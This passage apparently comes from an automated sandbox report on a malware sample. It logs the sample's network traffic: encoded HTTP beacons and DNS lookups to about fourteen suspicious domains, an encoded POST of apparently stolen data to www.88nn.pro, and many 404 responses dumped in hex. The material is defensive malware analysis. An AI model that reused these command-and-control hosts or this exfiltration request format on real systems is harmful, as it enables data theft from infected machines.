            Source: global trafficHTTP traffic detected: GET /t3gh/?56gD=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&gTSpc=Khb8pT HTTP/1.1Host: www.fontanerourgente.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zctj/?56gD=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&gTSpc=Khb8pT HTTP/1.1Host: www.onlytradez.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kyiu/?56gD=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=&gTSpc=Khb8pT HTTP/1.1Host: www.32wxd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /f9bc/?56gD=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&gTSpc=Khb8pT HTTP/1.1Host: www.jaxo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT HTTP/1.1Host: www.xforum.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l90v/?56gD=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&gTSpc=Khb8pT HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rgqx/?56gD=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&gTSpc=Khb8pT HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pT HTTP/1.1Host: www.anaidittrich.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT HTTP/1.1Host: www.551108k5.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gs9g/?gTSpc=Khb8pT&56gD=1tUju/dHge3HLZSeaGkKb9xpXzDM3iDxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90/pKfV4KQ80W7DCKACFqXJiPyHwctgLFsPv8= HTTP/1.1Host: www.datensicherung.emailAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /uhl0/?56gD=ncGfyjKG78FJ3RoiM5vIj9c1hRDw+kHAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI8bXCzTYoePvJD/HBD8ObPaKNbBrKYFELLGg=&gTSpc=Khb8pT HTTP/1.1Host: www.jiyitf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7o3y/?gTSpc=Khb8pT&56gD=34bWgTnU4AX1gKZq+j0JMo89G/eR8V4xUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UxrbVXfSA+Cuoh4JbcMUl7SslS3/OMRxqtpA= HTTP/1.1Host: www.tadalaturbo.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: www.weep.site
            Source: global trafficDNS traffic detected: DNS query: www.88nn.pro
            Source: global trafficDNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global trafficDNS traffic detected: DNS query: www.onlytradez.club
            Source: global trafficDNS traffic detected: DNS query: www.32wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.jaxo.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xforum.tech
            Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
            Source: global trafficDNS traffic detected: DNS query: www.taapbit.online
            Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
            Source: global trafficDNS traffic detected: DNS query: www.anaidittrich.com
            Source: global trafficDNS traffic detected: DNS query: www.551108k5.shop
            Source: global trafficDNS traffic detected: DNS query: www.datensicherung.email
            Source: global trafficDNS traffic detected: DNS query: www.jiyitf.top
            Source: global trafficDNS traffic detected: DNS query: www.tadalaturbo.online
            Source: unknownHTTP traffic detected: POST /l4rw/ HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.88nn.proReferer: http://www.88nn.pro/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 201Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36Data Ascii: 56gD=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:35:46 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:02 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:05 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:07 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:10 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:16 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:18 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:21 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Sep 2024 07:36:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Sep 2024 07:36:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Sep 2024 07:36:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Sep 2024 07:36:37 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:43 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:48 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:56 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 
68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
